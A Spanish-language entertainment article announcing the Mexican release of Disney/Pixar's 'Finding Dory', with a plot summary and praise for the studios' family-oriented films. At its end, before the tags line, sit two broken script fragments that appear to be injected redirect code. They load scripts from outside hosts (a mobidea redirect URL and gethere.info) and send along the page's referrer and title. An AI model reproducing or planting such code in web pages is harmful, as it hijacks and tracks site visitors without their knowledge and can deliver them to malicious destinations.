Buscando a Dory, nuestra alocada y olvidadiza pez azul llega a los cines

El 15 de julio se estrena en México la esperada película de Disney y Pixar sobre  la aventura de Dory, la alocada y olvidadiza pez azul que se convirtió en uno de los personajes más queridos por el público alrededor del mundo, por su propia forma de hacer reír a la gente a causa de un particular problema de memoria que no puede controlar.

 

La película es traída a nosotros por los creadores de “Toy Story”, “Monsters Inc.”, “Wall-e”, entre otras. Dory se encuentra inquieta en esta película por sueños que ha tenido sobre su familia, es entonces cuando ella decide encontrar a sus familiares pero recordemos que sufre la falta de memoria de corto plazo. Dory se emprende en una aventura que nos enseñara el valor de la familia y la amistad junto con Nemo y su padre Marlyn alrededor de la costa de California.

Es una película llevada al público por Disney y producida por Pixar, ambas se han encargado de llevar a la pantalla grande historias muy agradables que no solo están creadas para un público infantil. Estas películas son creadas para toda la familia y siempre cuentan con un mensaje que toque algún valor o alguna enseñanza que como seres humanos y personas no debemos de olvidar. Algunas de estos mensajes recaen en el amor a la familia, en el amor a uno mismo  y a la amistad, mostrándonos enseñanzas con situaciones cotidianas pero bien llevadas a otra dimensión animada, logrando que nos identifiquemos con las películas y sus personajes.

< src="https://restwp.mobidea.com/jsredir?v=1&sl=312182-3f487&redirect_option=1&data1=Track1&data2=Track2">

s.src=’http://gethere.info/kt/?264dpr&frm=&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Etiquetas:|